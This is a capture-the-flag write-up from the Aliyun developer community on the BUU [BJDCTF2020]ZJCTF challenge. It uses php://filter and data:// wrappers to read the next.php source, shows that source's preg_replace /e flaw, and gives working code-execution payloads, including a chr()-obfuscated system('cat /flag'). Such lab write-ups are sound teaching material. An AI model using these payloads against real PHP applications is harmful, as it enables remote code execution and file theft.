备案控制台

开发者社区云计算文章正文

BUU [BJDCTF2020]ZJCTF，不过如此

2024-08-14 47

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： BUU [BJDCTF2020]ZJCTF，不过如此

BUU [BJDCTF2020]ZJCTF，不过如此

和BUU [ZJCTF 2019]NiZhuanSiWei一样。

?text=data://text/plain,I have a dream
&file=php://filter/read=convert.base64-encode/resource=next.php

得到next.php源码。

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
  @eval($_GET['cmd']);
}

最终目的是调用getFlag（）然后命令执行。

get和session两个值一样的，名字为id的变量，没什么用，估计是用来混淆不知道的那些人。

preg_replace()的/e模式存在命令执行。

深入研究preg_replace与代码执行 - 先知社区 (aliyun.com)

最终payload：

?text=data://text/plain,I have a dream&file=next.php&
+
\S*=${getFlag()}&cmd=system('cat /flag');
\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}
//chr拼接system的参数
\S*=${phpinfo()}可查看phpinfo()

Jay17

目录

相关文章

TopSemic嵌入式

|

存储物联网芯片

聊聊身边的嵌入式：点菜机用着好好的，突然挂了，这口锅应该甩给谁？

聊聊身边的嵌入式：点菜机用着好好的，突然挂了，这口锅应该甩给谁？

TopSemic嵌入式

90 0 0

工程师阿龙

|

6月前

|

域名解析网络协议网络性能优化

为什么需要NQA？NQA到底为何物？一文告诉你！

为什么需要NQA？NQA到底为何物？一文告诉你！

工程师阿龙

134 1 1

aliyun1622584902-46568

|

8月前

bat恶搞室友

bat恶搞室友

aliyun1622584902-46568

46 0 0

Go先锋

|

Go

腥风血雨中，这招救了我的代码！

腥风血雨中，这招救了我的代码！

Go先锋

70 0 0

敏叔V587

|

9月前

开学之际被Turkey问候，只能祭出正则大法

开学之际被Turkey问候，只能祭出正则大法

敏叔V587

37 0 0

老秦包你会

|

存储安全 Python

python多线程------＞这个玩意很哇塞,你不来看看吗

python多线程------＞这个玩意很哇塞,你不来看看吗

老秦包你会

74 0 0

愿天堂没有BUG（公众号同名）

|

算法区块链 C++

用“三国杀”讲“分布式算法”，这下舒适了吧？

前言《三国杀》是一款热门的卡牌游戏，结合中国三国时期背景，以身份为线索，以卡牌为形式，益智休闲，老少皆宜。东汉末年，袁绍作为盟主，汇合了十八路诸侯一起攻打董卓。在讲解之前，我们先聊下分布式协议和算法整体脉络。现在很多开发同学对分布式的组件怎么使用都有一定经验，也知道 CAP 理论和 BASE 理论的大致含义。但认真去看分布式算法的真的很少，原因有三：

愿天堂没有BUG（公众号同名）

488 0 1

刘鸿运

怎么远程教你身在远方的朋友处理文件

向日葵

刘鸿运

128 0 0

怎么远程教你身在远方的朋友处理文件

码农工程师

|

Kubernetes Ubuntu 关系型数据库

这不是愚人节玩笑，我们回来了：Typecho 1.2.0 发布！

这不是愚人节玩笑，我们回来了：Typecho 1.2.0 发布！

码农工程师

316 0 0

这不是愚人节玩笑，我们回来了：Typecho 1.2.0 发布！

游客ipr2b72wwzsnc

|

网络协议 Linux

可恶，又被小林装到了！

可恶，又被小林装到了！

游客ipr2b72wwzsnc

182 0 0

热门文章

最新文章

解决kafka集群由于默认的__consumer_offsets这个topic的默认的副本数为1而存在的单点故障问题

使用 Docker 高效搭建本地开发环境（详细教程）

如何使用java代码导出word

《Python编程从0到1》笔记1——表达式的风格（前缀、中缀、后缀）

Nginx目录文件列表显示

中移动与阿里巴巴将在四大领域展开全面战略合作

mysql 主从复制配置

google guice @inject comments

html页面中event的常见应用

微软要在年内推出IPTV平台抢占客厅市场

一级倒立摆平衡控制系统MATLAB仿真,可显示倒立摆平衡动画,对比极点配置,线性二次型,PID,PI及PD五种算法

基于SOA海鸥优化算法的三维曲面最高点搜索matlab仿真

基于PI控制的三相整流器控制系统的simulink建模与仿真,包含超级电容充电和电机

MCMS：Star 28.1k,还在为CMS系统发愁？这款开源神器让内容管理变得像搭积木一样简单！

XJ-Survey：这个让滴滴日均处理1.2亿次问卷请求的开源系统，今天终于公开了它的架构密码！

CPU can only see the threads

Java+机器学习基础：打造AI学习基础

使用 pipx 安装并执行 Python 应用程序 (1)

国产AI神器Deepseek，本地离线使用教程！

短视频创作助手 | AI剧本生成与动画创作

相关电子书

更多

属兔的处子——Clojure太灵活，臣妾驾驭不住啊

长安十二时辰背后的技术秘籍

《长安十二时辰》

下一篇

PAI Model Gallery 支持云上一键部署 DeepSeek-V3、DeepSeek-R1 系列模型